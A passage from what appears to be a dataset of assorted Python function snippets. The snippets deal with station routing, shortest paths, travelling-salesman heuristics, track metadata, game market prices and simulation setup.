
of connections\n if self.total_connection[x] < totalconns:\n ipserver = x\n totalconns = self.total_connection[x]\n self.log.debug(\"Best available server: %s\" % ipserver)\n return ipserver", "def _get_earliest_start(self, valid_list):\n\n return min([item.coords[\"time\"].values[0] for item in valid_list])", "def find_straight_tracks(data_dict, scifi_event) :\n scifi_tracks = scifi_event.scifitracks()\n upstream_tracks = []\n downstream_tracks = []\n for track in scifi_tracks :\n if track.GetAlgorithmUsed() != STRAIGHT_ALGORITHM_ID :\n continue\n\n if track.tracker() == 0 :\n upstream_tracks.append(track)\n elif track.tracker() == 1 :\n downstream_tracks.append(track)\n\n# Only looking for single track events at present implementation\n track_list = []\n if len( upstream_tracks ) != 1 :\n return track_list\n if len( downstream_tracks) != 1 :\n return track_list\n\n track_list.append((upstream_tracks[0], downstream_tracks[0]))\n\n return track_list", "def _create_new_route(self, tick):\n if self.target_node_id is None:\n self.source_node_id = random.choice(Network.nodes).getID()\n else:\n self.source_node_id = self.target_node_id # We start where we stopped\n # random target\n self.target_node_id = random.choice(Network.nodes).getID()\n self.current_route_id = self.id + \"-\" + str(self.rounds)\n self.current_router_result = CustomRouter.minimal_route(self.source_node_id, self.target_node_id)\n \n if len(self.current_router_result.edges) > 0:\n traci.route.add(self.current_route_id, self.current_router_result.edges)\n return self.current_route_id\n else:\n # try again\n return self._create_new_route(tick)", "def NewStartingIndex(self) -> int:", "def minimum_sampling(self):\n # TODO: Allow `Source` to understand when this returns None?\n return 1.", "def CheckMinStationCount(ConnectionInfo, PathInfo, MinStationCount, EndStation, RouteConditions):\r\n\tif MinStationCount == None: return True\r\n\tNextStation = ConnectionInfo[ConnInfoInd['station_to']]\r\n\r\n\tif CheckIfPathTerminatesSuccessfully(ConnectionInfo, PathInfo, RouteConditions, EndStation) and len(PathInfo) < (MinStationCount-1):\r\n\t\treturn False\r\n\telse:\r\n\t\treturn True", "def __init__ (self, len_connections, station_objects, solution, max_minutes):\n\n self.len_connections = len_connections\n self.station_objects = station_objects\n self.state = copy.deepcopy(solution) \n self.K = self.state.set_K(len_connections)\n self.lining = []\n self.max_minutes = max_minutes", "def fill_first_stool(self: 'TOAHModel', number_of_cheeses: int):\n self._number_of_cheeses = number_of_cheeses\n first_stool = self.stool_lst[0]\n for cheese in range(1, number_of_cheeses+1):\n first_stool.append(Cheese(cheese))\n first_stool.sort(key = lambda cheese:cheese.size, reverse=True)\n self.end_game_stool = first_stool.copy()", "def addDistToTrack(track):\n\tfor i in range(0, len(track)):\t\t\n\t\tif (i == 0):\n\t\t\tprev = track[i]\t\t\t\n\t\t\ttrack[i].append(0)\n\t\telse:\n\t\t\tprev = track[i-1]\n\t\t\ttrack[i].append(getDist(prev[0], prev[1], track[i][0], track[i][1]))\t\n\treturn track", "def nearest_neighbor(self):\n steps = [{'Tour': [], 'Tourlength': 0}]\n tour = []\n original_nodes = self._datacontroller.get_data('nodes')\n nodes = copy.deepcopy(original_nodes)\n scale = self._datacontroller.get_data('scale')\n\n # Step 1: Get a tour start\n starts = [node for node in nodes if node.start]\n _start = 'Random from marked nodes'\n if not len(starts):\n starts = nodes\n _start = 'Random from all nodes'\n\n current = starts[randint(0, 
(len(starts) - 1))]\n while True:\n tour.append(current.nid)\n nodes.remove(current)\n steps.append(construct_step(tour, str(_start), 'random', original_nodes, scale))\n if not len(nodes):\n break\n current = nodes[tsputil.nearest_neighbor(nodes, current)[0]]\n tour.append(tour[0])\n steps.append(construct_step(tour, str(_start), 'random', original_nodes, scale))\n self._datacontroller.commit_change('pathsteps', steps)\n self._datacontroller.commit_change('path', steps[-1])", "def get_lowestbin_from_searchdata(self):\n # Get target players IDs\n playerids = []\n txt = open(\"./data/player_list.txt\", \"r\", encoding=\"utf8\")\n for aline in txt:\n values2 = aline.strip(\"\\n\").split(\",\")\n # make sure it doesn't read in the blank line at end of file\n if (len(values2) > 5):\n id = values2[7]\n playerids.append(id)\n txt.close()\n\n # Find cheapest listing from market data\n id_and_lowest_bin = [] # this will hold (id, lowest bin)\n for playerid in playerids:\n playerid = int(playerid)\n buynowprices = []\n\n futbin_price = 0\n txt = open(\"./data/market_logs.txt\", \"r\", encoding=\"utf8\")\n for aline in txt:\n player = aline.strip(\"\\n\").split(\",\")\n if (len(player) > 3):\n playername = player[5]\n marketid = int(player[10])\n overall = player[4]\n\n timeremainingSeconds = player[9]\n timeremainingSeconds = int(timeremainingSeconds)\n timeremainingMinutes = int(timeremainingSeconds/60)\n\n # print(marketid)\n # ID match, ID not Zero (exclude IFs), less than 57 mins (exclude undercuts)\n if (playerid == marketid) and (playerid != 0) and (timeremainingMinutes < 55):\n buynowprice = player[8]\n buynowprice = int(buynowprice)\n if (buynowprice != 10000):\n buynowprices.append(buynowprice)\n\n try:\n minimumbin = min(buynowprices)\n except:\n log_event(\n self.queue, \"ID mismatch -- minimum bin price array was empty\")\n log_event(self.queue, \"Minimum bin set to 0\")\n minimumbin = 0\n playername = self.getPlayerCardName(playerid)\n\n log_event(self.queue, str(playername) +\n \" min buy now from market data: \" + str(minimumbin))\n\n # Now we have player ID, and their lowest bin -- update it on GUI\n data = [playerid, minimumbin]\n id_and_lowest_bin.append(data)\n\n txt = open(\"./data/player_list.txt\", \"r\", encoding=\"utf8\")\n\n playerlist = []\n for aline in txt:\n values2 = aline.strip(\"\\n\").split(\",\")\n playerlist.append(values2)\n\n # Now that playerlist is saved in temp memory, clear the old user input list\n hs = open(\"./data/player_list.txt\", \"r+\", encoding=\"utf8\")\n hs.truncate(0)\n hs.close()\n\n # This is a terribly inefficient way of updating the GUI's playerlist with the market price. 
Its a first draft\n for entry in playerlist:\n # ignore blank line\n if (len(entry) > 3):\n entryid = int(entry[7])\n entry_futbinprice = int(entry[9])\n new_updated_actual_price = 0\n for x in id_and_lowest_bin:\n id = int(x[0])\n price = x[1]\n diff = entryid - id\n if (diff == 0):\n # print(\"got here\")\n mktprice = int(price)\n fbinprice = int(entry_futbinprice)\n diff = mktprice - fbinprice\n if (diff > 1000):\n new_updated_actual_price = fbinprice\n log_event(self.queue, \"Market price (\" + str(mktprice) +\n \") seems odd, will use Futbin price (\" + str(fbinprice) + \").\")\n else:\n log_event(\n self.queue, \"Confirmed mkt price seems accurate\")\n new_updated_actual_price = price\n\n # print(new_updated_actual_price)\n full_entry = \"\"\n count = 0\n for word in entry:\n if (count == 11):\n word = new_updated_actual_price\n word = str(word)\n word_comma = word + \",\"\n full_entry += word_comma\n count += 1\n\n # Remove last comma\n full_entry = full_entry[:-1]\n\n # Add new line to end\n hs = open(\"./data/player_list.txt\", \"a\", encoding=\"utf8\")\n hs.write(full_entry + \"\\n\")\n hs.close()", "def init_base_stations(mec_set: Dict[str,'Mec']) -> None:\n \n mec_keys = []\n mec_names = []\n \n for key, value in mec_set.items():\n mec_keys.append(key)\n mec_names.append(value.name)\n \n \n base_station_set = {\n \"base_station_set\": {}\n }\n \n bs_topology = onos_controller.OnosController.get_topology()\n mec_index = 0\n \n for base_station in bs_topology: \n bs_links = {}\n \n for link in base_station.links:\n dst_id = link.dst.device\n dst_port = link.dst.port\n dst_latency = None\n bs_links[dst_id] = {\n 'port': dst_port,\n 'latency': dst_latency\n } \n \n mec_name = 'MEC' + base_station.name[2:]\n mec_index = mec_names.index(mec_name)\n \n new_base_station_id = base_station.id\n new_base_station = BaseStation(\n name = base_station.name, \n mec_id = mec_keys[mec_index], \n wireless_latency = round(random.uniform(0.1, 0.3), 2),\n links = DefaultMunch.fromDict(bs_links)\n )\n base_station_set['base_station_set'][new_base_station_id] = new_base_station\n \n \n BaseStationController.set_bs_net_latency(base_station_set['base_station_set'])\n json_controller.EncoderController.encoding_to_json(base_station_set)\n return", "def build_next_stations(stations):\n\n station_0_bikes = stations[0]['bikesAvailable']\n station_1_bikes = stations[1]['bikesAvailable']\n\n return f\"On station {stations[0]['name']} is {station_0_bikes} \" \\\n f\"bike{'s' if station_0_bikes > 1 else ''} available and on station\" \\\n f\"{stations[1]['name']} is {station_1_bikes} \" \\\n f\"bike{'s' if station_1_bikes > 1 else ''} available. 
Goodbye and happy cycling!\"", "def addStationMarker(self, x, y, label, staMinDist=STA_MIN_DIST, **kwargs):\n xAlong, minDist = projectXYOnTransect(\n x, y, self.xyPoints[\n :, 0], self.xyPoints[\n :, 1], self.xAlong)\n if minDist > staMinDist:\n print 'point too far from the transect, omitting', label, minDist, staMinDist\n return\n # if close enough, just use x coordinate\n transectSnapshot.addStationMarker(self, xAlong, label, **kwargs)", "def dykstra(self,origin):\n G = nx.Graph()\n G.add_node(origin,shortest_path = 0)\n active_nodes = [origin]\n\n while len(active_nodes) > 0:\n a_n = active_nodes.pop() # active node\n\n for n in self.neighbors.get(a_n,[]): #catch no neighbor exception\n d = self.difference(n, origin)**4 # increase cost of extra distance\n this_path = G.node[a_n]['shortest_path'] + d\n\n if this_path < self.epsilon:\n if n in G.node: # seen this node before\n if this_path < G.node[n]['shortest_path']: # if this path is better than previous best path\n G.node[n]['shortest_path'] = this_path\n G.add_edge(a_n,n) # add edge just because\n continue\n\n G.add_node(n,shortest_path = this_path) # if this is new, add it to graph\n G.add_edge(a_n,n) # add edge just because\n active_nodes.append(n) # add new active node\n return G", "def get_best_roundtrip(self):\n out = min(self.outgoing_flights, key=lambda f: f.price)\n ret = min(self.return_flights, key=lambda f: f.price)\n\n return RoundTrip(out, ret)", "def shortest_flight(self):\r\n distance = sys.maxsize\r\n for code, _list in self.edges.items():\r\n for edge in _list:\r\n if edge.distance < distance:\r\n distance = edge.distance\r\n start = edge.start\r\n destination = edge.destination\r\n return start, destination, distance", "def start_trip(self, trip):\n with closing(self.db.cursor()) as cursor:\n t = datetime.datetime.fromtimestamp(time.time()).strftime(\"%Y-%m-%d %H:%M:%S\")\n query = \"INSERT INTO Trips (StartTime, EndTime) VALUES('\"+t+\"', '\"+t+\"')\"\n #cursor = self.db.cursor()\n cursor.execute(query)\n trip.set_id(cursor.lastrowid)\n self.db.commit()", "def run():\n #Initialise variables\n data = build_station_list()\n update_water_levels(data)\n ls = []\n ID = []\n \n #Number of days in past taken data from\n dt = 7\n #How many graphs per window\n limit = 4\n #How many stations\n number = 6\n \n #Create list of measuring_id's sorted by water level\n for station in data:\n if station.typical_range_consistent() == True and station.relative_water_level() != None:\n ls.append((station, station.relative_water_level()))\n\n ls = sorted_by_key(ls, 1)\n \n for station in ls:\n ID.append(station[0])\n \n s = count_inconsistent_sets(ID[:number], dt)\n \n ID = ID[:number+s]\n\n plot_water_levels(ID, dt, limit, s)", "def add_market_street(market, start):\r\n market.append(make_market_street(start))", "def nearest_neighbor_tsp(shortest_paths, starting_point=0):\n number_of_nodes = len(shortest_paths)\n unvisited_nodes = list(range(number_of_nodes))\n unvisited_nodes.remove(starting_point)\n visited_nodes = [starting_point]\n\n while number_of_nodes > len(visited_nodes):\n neighbor_distances = pd.Series(shortest_paths[visited_nodes[-1]])\n neighbor_distances = neighbor_distances[(neighbor_distances > 0) &\n (neighbor_distances.index\n .isin(set(unvisited_nodes)))]\n next_node = neighbor_distances.idxmin()\n visited_nodes.append(next_node)\n unvisited_nodes.remove(next_node)\n return visited_nodes", "def addWlan(self, station): \n phyInt.phy[station] = phyInt.totalPhy[self.currentPhy][3:]\n os.system(\"iw phy phy%s set 
netns %s\" % (phyInt.phy[station], station.pid)) \n wif = station.cmd(\"iwconfig 2>&1 | grep IEEE | awk '{print $1}'\").split(\"\\n\")\n wif.pop()\n for iface in wif:\n if iface[:4]==\"wlan\":\n try:\n self.nextWlan[str(station)] += 1\n except:\n self.nextWlan[str(station)] = 0\n netxWlan = self.nextWlan[str(station)] \n self.renameIface(station, netxWlan, iface)\n self.currentPhy+=1", "def addStationMarker(\n self,\n tag,\n x,\n y,\n label,\n staMinDist=STA_MIN_DIST,\n **kwargs):\n if tag != 'all':\n xPts = self.xyPoints[tag][:, 0]\n yPts = self.xyPoints[tag][:, 1]\n xAlo = self.xAlong[tag]\n xAlong, minDist = projectXYOnTransect(x, y, xPts, yPts, xAlo)\n if minDist > staMinDist:\n print 'point too far from the transect, omitting', tag, label, minDist, staMinDist\n return\n # if close enough, just use x coordinate\n stackTransectPlot.addStationMarker(\n self, tag, xAlong, label, **kwargs)\n else:\n for t in self.plots: # recursion\n self.addStationMarker(t, x, y, label, staMinDist, **kwargs)", "def set_track_info(self, payload):\n self.raw_trackname = payload['currentTrack'].get('title', \"\")\n self.artist = payload['currentTrack'].get('artist', \"\")\n self.album = payload['currentTrack'].get('album', \"\")\n self.station = payload['currentTrack'].get('stationName', \"\")\n\n if sonos_settings.artist_and_album_newlook :\n if self.raw_trackname.startswith(\"x-sonosapi-\") :\n self.raw_trackname = self.station\n\n if self.artist == self.station and self.type == \"radio\" :\n if self.raw_trackname.count(\"~\") : c = \"~\"\n elif self.raw_trackname.count(\"˗\") : c = \"˗\"\n elif self.raw_trackname.count(\"*\") : c = \"*\"\n elif self.raw_trackname.count(\"|\") : c = \"|\"\n elif self.raw_trackname.count(\" - \") : c = \" - \"\n elif self.raw_trackname.count(\" / \") : c = \" / \"\n else : c = \"\"\n\n if c :\n oldstr=self.raw_trackname.casefold()\n splitstr = oldstr.split(c)\n self.artist = ' '.join(word[0].upper() + word[1:] for word in splitstr[0].split())\n self.raw_trackname = ' '.join(word[0].upper() + word[1:] for word in splitstr[1].split())\n if c == \"~\" :\n self.album = ' '.join(word[0].upper() + word[1:] for word in splitstr[2].split())\n else :\n self.album = \"\"\n# self.album = self.station\n\n # Abort update if all data is empty\n if not any([self.album, self.artist, self.duration, self.station, self.raw_trackname]):\n _LOGGER.debug(\"No data returned by the API, skipping update\")\n return None\n\n if self.type == \"radio\" and not self.station:\n # if not then try to look it up (usually because its played from Alexa)\n self.station = find_unknown_radio_station_name(self.raw_trackname)\n\n # Clear uninteresting tracknames\n if self.raw_trackname.startswith(\"x-sonosapi-\") or self.raw_trackname.endswith(\".m3u8\"):\n self.trackname = \"\"\n else:\n self.trackname = self.raw_trackname\n\n\n track_id = self.artist\n if self.trackname:\n track_id += f\" - {self.trackname}\"\n if self.album:\n track_id += f\" ({self.album})\"\n if self.duration:\n track_id += f\" - {timedelta(seconds=self.duration)}\"\n if self.station:\n track_id += f\" [{self.station}]\"\n\n return track_id", "def start(self):\r\n self.setDriver('ST', 1)", "def _sampleTrackway(self, trackway, windowSize):\n\n window = []\n samples = []\n\n entries = self.trackHeadingData[trackway.uid]['entries']\n analysisTrackway = trackway.getAnalysisPair(self.analysisSession)\n\n for entry in entries:\n # For each track entry in the trackways data add that to the sample window and update\n # the samples result\n\n 
window.append(entry)\n\n if len(window) < windowSize:\n # Don't create a sample until the sub-sample list exceeds the sample window size\n continue\n\n xTests = [] # X spatial position values\n yTests = [] # Y spatial position values\n angleTests = [] # Heading angle values\n curvePosTests = [] # Curve position values\n for item in window:\n # Calculate weighted averages for various properties of the current sample window\n\n angle = item.headingAngle\n angleTests.append(angle.valueDegrees)\n\n # Create a ValueUncertainty for the curve position by using the fractional\n # positional uncertainty over the spatial length of the curve\n posValue = item.track.positionValue\n posUnc = math.sqrt(posValue.xUnc**2 + posValue.yUnc**2)\n curvePos = item.track.getAnalysisPair(self.analysisSession).curvePosition\n curvePosUnc = abs(posUnc/analysisTrackway.curveLength)\n curvePosTests.append(NumericUtils.toValueUncertainty(curvePos, curvePosUnc))\n\n pv = item.track.positionValue\n xTests.append(pv.xValue)\n yTests.append(pv.yValue)\n\n directionAngleMean = NumericUtils.weightedAverage(*angleTests)\n curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)\n xValue = NumericUtils.weightedAverage(*xTests)\n yValue = NumericUtils.weightedAverage(*yTests)\n position = PositionValue2D(\n x=xValue.raw, xUnc=xValue.rawUncertainty,\n y=yValue.raw, yUnc=yValue.rawUncertainty)\n\n # Remove the oldest sample from the to make room for a new sample in the next iteration\n window.pop(0)\n\n if len(samples) > 0:\n # Compare this sample to the previous one and if it does not differ\n # significantly then continue to continue to the next iteration\n last = samples[-1].directionAngle\n totalUnc = last.rawUncertainty + directionAngleMean.rawUncertainty\n deviation = abs(directionAngleMean.raw - last.raw)/totalUnc\n if deviation < 2.0:\n continue\n\n samples.append(self.SAMPLE_DATA_NT(\n directionAngle=directionAngleMean,\n position=position,\n curvePoint=(\n curvePositionMean.value, directionAngleMean.value,\n curvePositionMean.uncertainty, directionAngleMean.uncertainty),\n curvePosition=curvePositionMean,\n track=entry.track ))\n\n self._extendSamplesToTrackwayStart(entries[0], samples)\n self._extendSampleToTrackwayEnd(entries[-1], samples)\n return samples", "def start_traffic(self):\n raise NotImplementedError", "def set_start_times(self):\n for i in self.legs:\n assert isinstance(i, RelayLeg)\n i.set_start_time_from_previous()", "def getShortestCoordinate (analyzer,startLat, startLon, endLat, endLon):\n estacionOrigen=model.getCloserStation (analyzer, startLat, startLon)\n estacionDestino=model.getCloserStation (analyzer, endLat, endLon)\n ruta,tiempo=model.getShortestCoordinate(analyzer,estacionOrigen, estacionDestino)\n return (estacionOrigen,estacionDestino,ruta,tiempo)", "def media_next_track(self):\n self._lms.query(self._id, 'playlist', 'index', '+1')\n self.update_ha_state()", "def reserve(n):\n global _tracks\n if n >= len(_tracks):\n _tracks += [False]*(n-len(_tracks)+1)\n _tracks[n] = True", "def start_tracker(self):\n while self.tracker_enabled:\n # Sleep a bit to leave more time to other threads\n time.sleep(Tracker.LOOP_SLEEP)\n # self._log_queue_lengths()\n if not self.frames_to_track:\n continue\n frame_to_track = self.frames_to_track.popleft()\n frame_tracked = self.track_controllers_in_frame(\n frame_to_track, self.drum_set.controllers)\n self.frames_tracked.append(frame_tracked)\n self.drum_set.play()", "def choose_next_player(self):\n player_index = 
self.players.index(self.current_player)\n if self.direction_clock_wise:\n if player_index >= len(self.players) - 1:\n self.current_player = self.players[0]\n else:\n self.current_player = self.players[player_index + 1]\n else:\n if player_index <= 0:\n self.current_player = self.players[len(self.players) - 1]\n else:\n self.current_player = self.players[player_index - 1]", "def initSource(\n frame,\n center,\n observation,\n symmetric=False,\n monotonic=True,\n thresh=1,\n maxComponents=1,\n edgeDistance=1,\n shifting=False,\n downgrade=True,\n fallback=True,\n minGradient=0,\n):\n from .source import PointSource, ExtendedSource\n\n while maxComponents > 1:\n try:\n source = ExtendedSource(\n frame,\n center,\n observation,\n thresh=thresh,\n shifting=shifting,\n K=maxComponents,\n )\n try:\n source.check_parameters()\n # Make sure that SED is >0 in at least 1 band\n if np.any(\n [\n np.all(child.children[0].get_model() <= 0)\n for child in source.children\n ]\n ):\n raise ArithmeticError\n except ArithmeticError:\n msg = \"Could not initialize source at {} with {} components\".format(\n center, maxComponents\n )\n logger.warning(msg)\n raise ValueError(msg)\n\n if downgrade and np.all(np.array(source.bbox.shape[1:]) <= 8):\n # the source is in a small box so it must be a point source\n maxComponents = 0\n elif downgrade and np.all(np.array(source.bbox.shape[1:]) <= 16):\n # if the source is in a slightly larger box\n # it is not big enough to model with 2 components\n maxComponents = 1\n elif hasEdgeFlux(source, edgeDistance):\n source.shifting = True\n\n break\n except Exception as e:\n if not fallback:\n raise e\n # If the MultiComponentSource failed to initialize\n # try an ExtendedSource\n maxComponents -= 1\n\n if maxComponents == 1:\n try:\n source = ExtendedSource(\n frame, center, observation, thresh=thresh, shifting=shifting\n )\n\n try:\n source.check_parameters()\n if np.all(source.children[0].get_model() <= 0):\n raise ArithmeticError\n except ArithmeticError:\n msg = \"Could not initlialize source at {} with 1 component\".format(\n center\n )\n logger.warning(msg)\n raise ValueError(msg)\n\n if downgrade and np.all(np.array(source.bbox.shape[1:]) <= 16):\n # the source is in a small box so it must be a point source\n maxComponents = 0\n elif hasEdgeFlux(source, edgeDistance):\n source.shifting = True\n except Exception as e:\n if not fallback:\n raise e\n # If the source is too faint for background detection,\n # initialize it as a PointSource\n maxComponents -= 1\n\n if maxComponents == 0:\n try:\n source = PointSource(frame, center, observation)\n except Exception:\n # None of the models worked to initialize the source,\n # so skip this source\n return None\n\n if hasEdgeFlux(source, edgeDistance):\n # The detection algorithm implemented in meas_algorithms\n # does not place sources within the edge mask\n # (roughly 5 pixels from the edge). This results in poor\n # deblending of the edge source, which for bright sources\n # may ruin an entire blend. 
So we reinitialize edge sources\n # to allow for shifting and return the result.\n if not isinstance(source, PointSource) and not shifting:\n return initSource(\n frame,\n center,\n observation,\n symmetric,\n monotonic,\n thresh,\n maxComponents,\n edgeDistance,\n shifting=True,\n )\n source.isEdge = True\n else:\n source.isEdge = False\n\n return source", "def initialize_new_spot(new_spot_data, connected_data):\n if (connected_data.keys()):\n new_id = max(connected_data.keys()) + 1\n else:\n new_id = 1\n connected_data[new_id] = np.expand_dims(new_spot_data, 0)", "def set_player_start_position(self):\n if self.field_size.x() == 0: return\n \n parts = len(self.player_list)\n y_list = []\n for p in range(1,parts+1):\n y_list.append(self.field_size.y()*p/(parts+1))\n\n for i,p in enumerate(self.player_list):\n p1 = Qt.QPoint(self.start_y,y_list[i])\n p2 = Qt.QPoint(self.start_y+self.start_length,y_list[i])\n p.set_start_position([p1,p2])\n p.status_remove = False\n p.override_direction(0)", "def make_start_moves(self):\n self.geos = Geos([])\n\n if g.config.machine_type == 'drag_knife':\n self.make_swivelknife_move()\n return\n\n # Get the start rad. and the length of the line segment at begin.\n start_rad = self.shape.parentLayer.start_radius\n\n # Get tool radius based on tool diameter.\n tool_rad = self.shape.parentLayer.getToolRadius()\n\n # Calculate the starting point with and without compensation.\n start = self.start\n angle = self.angle\n\n if self.shape.cut_cor == 40:\n self.append(RapidPos(start))\n \n elif self.shape.cut_cor != 40 and not g.config.vars.Cutter_Compensation[\"done_by_machine\"]:\n\n toolwidth = self.shape.parentLayer.getToolRadius()\n offtype = \"in\" if self.shape.cut_cor == 42 else \"out\"\n offshape = offShapeClass(parent = self.shape, offset = toolwidth, offtype = offtype)\n\n if len(offshape.rawoff) > 0:\n start, angle = offshape.rawoff[0].get_start_end_points(True, True)\n\n self.append(RapidPos(start))\n self.geos += offshape.rawoff\n\n # Cutting Compensation Left\n elif self.shape.cut_cor == 41:\n # Center of the Starting Radius.\n Oein = start.get_arc_point(angle + pi/2, start_rad + tool_rad)\n # Start Point of the Radius\n Ps_ein = Oein.get_arc_point(angle + pi, start_rad + tool_rad)\n # Start Point of the straight line segment at begin.\n Pg_ein = Ps_ein.get_arc_point(angle + pi/2, start_rad)\n\n # Get the dive point for the starting contour and append it.\n start_ein = Pg_ein.get_arc_point(angle, tool_rad)\n self.append(RapidPos(start_ein))\n\n # generate the Start Line and append it including the compensation.\n start_line = LineGeo(start_ein, Ps_ein)\n self.append(start_line)\n\n # generate the start rad. and append it.\n start_rad = ArcGeo(Ps=Ps_ein, Pe=start, O=Oein,\n r=start_rad + tool_rad, direction=1)\n self.append(start_rad)\n\n # Cutting Compensation Right\n elif self.shape.cut_cor == 42:\n # Center of the Starting Radius.\n Oein = start.get_arc_point(angle - pi/2, start_rad + tool_rad)\n # Start Point of the Radius\n Ps_ein = Oein.get_arc_point(angle + pi, start_rad + tool_rad)\n # Start Point of the straight line segment at begin.\n Pg_ein = Ps_ein.get_arc_point(angle - pi/2, start_rad)\n\n # Get the dive point for the starting contour and append it.\n start_ein = Pg_ein.get_arc_point(angle, tool_rad)\n self.append(RapidPos(start_ein))\n\n # generate the Start Line and append it including the compensation.\n start_line = LineGeo(start_ein, Ps_ein)\n self.append(start_line)\n\n # generate the start rad. 
and append it.\n start_rad = ArcGeo(Ps=Ps_ein, Pe=start, O=Oein,\n r=start_rad + tool_rad, direction=0)\n self.append(start_rad)", "def connect_stim(self):\n self.stim = h.NetStim()\n self.stim.number = self.stim_number\n self.stim.start = 9\n self.ncstim = h.NetCon(self.stim, self.cells[0].synlist[0])\n self.ncstim.delay = 1\n self.ncstim.weight[0] = self.stim_w # NetCon weight is a vector.", "def constructShortestPath(self):\r\n sp = []\r\n v = self.t\r\n while self.preds[v]: # is not None\r\n sp.append(v)\r\n v = self.preds[v]\r\n sp.append(self.s) # source\r\n sp.reverse() # to have the path from source to dest and not t to s\r\n return sp, self.graph.getCoords(sp)", "def start_tracker(self):\n\n # Load the live_craft_position service\n live_craft_position = None\n\n # Start the tracker if there isn't already one running\n if self._tracking_update_loop is None or not self._tracking_update_loop.running:\n self._live_craft_position_service = live_craft_position\n self._tracking_update_loop = task.LoopingCall(self._track_target)\n tracking_loop_deferred = self._tracking_update_loop.start(self.update_interval)\n tracking_loop_deferred.addErrback(self._handle_tracker_error)\n return tracking_loop_deferred\n else:\n return None", "def setUpNextGameRound(self):\n\t\tself.pots = [0]\n\t\tself.currentBet = [0]\n\t\tself.reinitDeck()\n\t\tself.communityCards = []\n\t\tallPlayers = self.getPlayers()\n\t\tself.resetPlayerHands(allPlayers)\n\t\tself.resetPlayerBetAmount(allPlayers)\n\t\t_, seat = self.findNthPlayerFromSeat(self.curDealerSeatNo, 1)\n\t\tself.curDealerSeatNo = seat\n\t\tself.beginRound()", "def get_station_graph(start_station_id, end_station_list):\n start_station_graph = []\n for i in range(10):\n if end_station_list[i] is not None:\n start_station_graph.append((start_station_id, end_station_list[i]))\n return start_station_graph", "def rrt_search(self):\n self.tree.AddVertex(self.start_config)\n self.tree.AddEdge(self.start_config, self.start_config)\n\n while True:\n x_new, x_nearest = self.new_and_near()\n if x_new is None:\n # print(\"it's None\")\n continue\n # connect shortest valid edge\n # print(\"new point\", x_new)\n self.connect_to_point(x_nearest, x_new)\n\n # probabilistically check if solution found\n if self.goal_config in self.tree.vertices:\n print(\"find it\")\n path = self.planning_env.reconstruct_path(self.tree.edges, self.start_config, self.goal_config)\n if path is not None:\n return path\n\n if self.name=='rrtstar' and self.tree.samples_taken > 10:\n return []\n # # check if can connect to goal after generating max_samples\n if self.tree.samples_taken >= self.tree.max_samples:\n return []", "def getShortestPath(self, src, dest):\n vertices = self.floorGraph.getVertList()\n unvisitedQueue = []\n srcPath = Path()\n srcPath.addNode(src)\n srcPath.pathValue = 0\n unvisitedQueue.append(srcPath)\n connections = self.floorGraph.getVertex(src).getConnections()\n #initialisez distances\n for vertex in vertices:\n newPath = Path()\n newPath.nodeList = list(srcPath.nodeList)\n newPath.addNode(vertex)\n if self.floorGraph.getVertex(vertex) in connections:\n newPath.pathValue = self.floorGraph.getVertex(src).getWeight(self.floorGraph.getVertex(vertex))\n unvisitedQueue.append(newPath)\n else:\n newPath.pathValue = math.inf\n self.shortestDistanceMap[src+vertex] = newPath\n # updates distances as per shorter routes\n while len(unvisitedQueue) is not 0:\n unvisitedQueue = sorted(unvisitedQueue, key=functools.cmp_to_key(compareNodes))\n chkPath = unvisitedQueue.pop(0)\n 
chkNode = chkPath.nodeList[len(chkPath.nodeList)-1]\n for vertex in vertices:\n if(self.floorGraph.getVertex(vertex) in self.floorGraph.getVertex(chkNode).getConnections()):\n newWeight = chkPath.pathValue + self.floorGraph.getVertex(chkNode).getWeight(self.floorGraph.getVertex(vertex))\n if(newWeight < self.shortestDistanceMap[src+vertex].pathValue):\n self.shortestDistanceMap[src+vertex].pathValue = newWeight\n self.shortestDistanceMap[src+vertex].nodeList = list(chkPath.nodeList)\n self.shortestDistanceMap[src+vertex].nodeList.append(vertex)\n newPath = Path()\n newPath.nodeList = list(self.shortestDistanceMap[src+vertex].nodeList)\n newPath.pathValue = newWeight\n unvisitedQueue.append(newPath)\n print(self.shortestDistanceMap[src+dest].nodeList)\n print(self.shortestDistanceMap[src+dest].pathValue)", "def start_ranging(self):\n Utils.check(VL53L1X_C_LIBRARY.VL53L1_StartMeasurement(self.dev))", "def stations():\n\n return station_list", "def a_star(start, goal='Bucharest'):\n x,_ = min([(x, y + lr[x]) for x, y in d[start]], key = lambda x: x[1])\n if x not in lista_final:\n lista_final.append(x)\n else:\n x,_ = sorted([(x, y + lr[x]) for x, y in d[start]],key=lambda x: x[1])[1]\n lista_final.append(x)\n \n if 'Bucharest' not in lista_final:\n a_star(lista_final[-1])\n return(lista_final)", "def place_hub(self, board, state): # pylint: disable=W0613\n minspot = None\n mincost = None\n for i in range(0, board.rows):\n for j in range(0, board.cols):\n if minspot is None:\n minspot = (i, j)\n mincost = self.costs[i][j]\n elif self.costs[i][j] < mincost:\n minspot = (i, j)\n mincost = self.costs[i][j]\n self.hub = minspot\n return minspot", "def begin(self):\r\n self.queue.append((self.start, 0.0))\r\n self.cost_to_pos[self.start] = 0\r\n self.loop()", "def connectSticks(A):\n if len(sticks) == 1:\n return 0\n\n import heapq\n heapq.heapify(sticks)\n\n cost = 0\n while len(sticks) > 1:\n x, y = heapq.heappop(sticks), heapq.heappop(sticks)\n cost += x + y\n heapq.heappush(sticks, x+y)\n\n return cost", "def startup(self):\n # Initializing the cycle data (cd) dictionary\n self.cd[\"started_up\"] = False\n self.cd[\"peak_pressure\"] = 0\n self.cd[\"tidal_volume\"] = 0\n self.cd[\"inhale_duration\"] = 0\n self.cd[\"exhale_duration\"] = 0\n self.cd[\"IE_ratio\"] = 1\n self.cd[\"PEEP\"] = 0\n\n to = 2 # Timeout\n startup_cycles = 0\n limit = 20\n # If the piston position is unknown\n last_cycle = time.time()\n while not self.piston.piston_at_bottom and not self.piston.piston_at_top:\n if self.pst_dir == 1:\n self.piston.pst_up()\n if time.time() - last_cycle > to:\n self.pst_dir = 0\n startup_cycles += 1\n last_cycle = time.time()\n else:\n self.piston.pst_down()\n if time.time() - last_cycle > to:\n self.pst_dir = 1\n startup_cycles += 1\n last_cycle = time.time()\n if startup_cycles >= limit:\n print(\"There is a problem at startup, check compressed air\")\n print(f\"Tried to startup for {startup_cycles} cycles\")\n # Breaks the loop so that the controller doesn't start\n self.signal_startup_error.emit(True)\n return\n while not self.piston.piston_at_top:\n self.piston.pst_up()\n self.piston.stop()\n\n print(f\"startup_cycles: {startup_cycles}\")\n self.cd[\"started_up\"] = True\n 